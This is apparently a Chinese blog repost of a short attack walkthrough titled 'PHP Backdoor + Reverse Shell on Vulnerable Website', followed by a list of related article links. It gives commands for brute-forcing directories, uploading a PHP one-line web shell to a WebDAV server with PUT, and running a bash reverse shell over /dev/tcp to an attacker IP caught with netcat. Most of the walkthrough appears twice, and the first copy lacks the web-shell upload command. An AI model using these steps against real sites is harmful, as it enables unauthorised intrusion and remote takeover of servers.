PHP Backdoor + Reverse Shell on Vulnerable Website
2017-02-01 20:08
218 查看
翻译总结自:
https://shellgam3.com/2016/07/27/php-backdoor-reverse-shell-on-vulnerable-website/
扫描Web服务器,爆破常见目录
dirb http://xxxxxxxx
proxychains curl -X OPTIONS -v http://X.X.X.X/test/
上面的请求应该是 WebDAV 服务器. 使用 “PUT” 方法可以上传文件
比如一句话:<?php echo system($_GET[“cmd”]); ?>
上传文件:
浏览器访问:X.X.X.X/test/cmd.php?cmd=ls%20/
上传一个反弹shell
exec 5<>/dev/tcp/xxx.xxx.xxx.xxx/443
cat <&5 | while read line; do $line 2>&5 >&5; done
proxychains curl --upload-file /root/Desktop/bash_shell.sh -v --url http://X.X.X.X/test/shell.sh -0 --http1.0
本机监听端口,比如netcat:sudo nc -v -l -p 443
浏览器访问:X.X.X.X/test/cmd.php?cmd=bash shell.sh
https://shellgam3.com/2016/07/27/php-backdoor-reverse-shell-on-vulnerable-website/
扫描Web服务器,爆破常见目录
dirb http://xxxxxxxx
proxychains curl -X OPTIONS -v http://X.X.X.X/test/
上面的请求应该是 WebDAV 服务器. 使用 “PUT” 方法可以上传文件
比如一句话:<?php echo system($_GET[“cmd”]); ?>
上传文件:
proxychains curl --upload-file /root/Desktop/cmd.php -v --url http://X.X.X.X/test/cmd.php -0 --http1.0
浏览器访问:X.X.X.X/test/cmd.php?cmd=ls%20/
上传一个反弹shell
exec 5<>/dev/tcp/xxx.xxx.xxx.xxx/443
cat <&5 | while read line; do $line 2>&5 >&5; done
proxychains curl --upload-file /root/Desktop/bash_shell.sh -v --url http://X.X.X.X/test/shell.sh -0 --http1.0
本机监听端口,比如netcat:sudo nc -v -l -p 443
浏览器访问:X.X.X.X/test/cmd.php?cmd=bash shell.sh
相关文章推荐
- php-reverse-shell
- php-reverse-shell
- Php reverse shell with netcat
- Configuring Secure Shell on Cisco IOS Routers
- 此文有助于帮助shell功底不高,PHP水平差不多的人,HOHO,收藏下
- [导入]受Ruby on Rails影响的PHP开发框架
- reverse shellcode调试问题问答
- 将PHP作为Shell脚本语言使用
- A Try on valid XHTML-strict and CSS-valided website.
- Carmack's Reverse(John Carmack on shadow volumes...)(珍贵历史资料)
- 将PHP作为Shell脚本语言使用
- PHP on Rails: CakePHP
- PHPshell
- PHP on Windows
- Install and config Apache, PHP, MySql on windows XP
- 受Ruby on Rails影响的PHP开发框架
- phpshell木马内容
- 将PHP作为Shell脚本语言使用
- Developing A PHP Core Backdoor